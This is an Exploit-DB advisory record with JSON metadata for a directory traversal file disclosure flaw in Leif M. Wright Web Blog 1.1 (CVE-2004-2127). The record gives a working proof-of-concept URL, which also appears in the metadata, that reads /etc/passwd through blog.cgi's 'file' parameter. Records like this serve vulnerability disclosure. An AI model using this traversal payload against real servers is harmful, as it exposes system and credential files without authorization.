ID EDB-ID:23613 Type exploitdb Reporter Zone-h Security Team Modified 2004-01-20T00:00:00
Description
source: https://www.securityfocus.com/bid/9517/info
Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information.
http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd
{"id": "EDB-ID:23613", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Leif M. Wright Web Blog 1.1 - File Disclosure", "description": "", "published": "2004-01-20T00:00:00", "modified": "2004-01-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/23613", "reporter": "Zone-h Security Team", "references": [], "cvelist": ["2004-2127"], "immutableFields": [], "lastseen": "2022-01-13T06:28:13", "viewCount": 13, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/23613", "sourceData": "source: https://www.securityfocus.com/bid/9517/info\r\n\r\nWeb Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information. \r\n\r\nhttp://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd ", "osvdbidlist": ["3739"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1646785584}}